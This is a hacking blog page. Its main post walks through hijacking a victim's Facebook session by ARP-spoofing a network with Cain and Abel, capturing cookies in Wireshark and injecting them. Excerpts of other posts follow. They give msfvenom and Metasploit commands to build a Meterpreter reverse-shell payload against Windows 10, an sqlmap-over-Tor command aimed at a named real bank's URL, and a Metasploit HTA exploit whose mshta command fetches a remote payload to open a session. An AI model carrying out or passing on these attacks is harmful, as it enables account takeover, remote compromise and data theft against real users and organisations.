Skip to main content

Hacking Facebook using wireshark

Step 1:CYBERATOR

Download Following Tools and Scripts:

Cain and Abel(http://www.oxid.it/cain.html)
Wireshark (http://www.wireshark.org/download.html)
Mozilla Add-ons : GreaseMonkey (Search in Mozilla add-ons)
Cookie Injector Script (http://userscripts.org/scripts/source/119798.user.js)

Step 2:

Open Cain & Abel
Navigate to “Configure” menu and open configuration Dialog and check the configuration settings…


 Step 3:

 Click on (Start/Stop) Sniffing button.
 Clicktab.
 Click on button.


 Now, the following window will appear….


Now Click on OK button…..Scanning Starts

Step 4:

 Switch to tab listed below.
 Click on Button, a pop-up window will appear.

 Now Select the IP Address of the victim from the left panel of window and the Router IP in the right  panel…..as shown below:



Click OK button.

Step 5:

 Select the IP in the table.
 Click onbutton.



Step 6: On the Victim’s PC:

Start any Browser and open facebook.com (force Http)


   

Step 7: Now Back to Attacker’s Pc

 Open Wireshark
 Navigate to Capture>Interface (or press Ctrl+I)
 Select your active wireless adaptor

 

Step 8:

 Refresh victims Facebook page
 Open your Wireshark window, now you can see the flow of packets
 Type “http:cookie contains datr” in the filter box.
 Click on button.

  Search for “Generic.php” or “ai.php
 Right click on the particular packet then select “copy>bytes>Printable Text Only”.
 Right click on the particular packet then select “follow TCP Stream”.
 Open up your browser, open http://www.facebook.com.
 Press Alt+C (small wireshark cookie dump will appear).
 Paste the cookie that we copied earlier (Ctrl+v).
 Press OK.

Now reload the page….


We have the Session now…. :)

Comments

  1. this is rajasekar @ ramco institute of technology.
    please send me ur mail id sir---my mail id is "dhevasekar2@gmail.com"
    your way to facebook crack was so good....

    ReplyDelete

Post a Comment

Popular posts from this blog

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    set lport 8080    set lhost <your IP address>    exploit S

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l and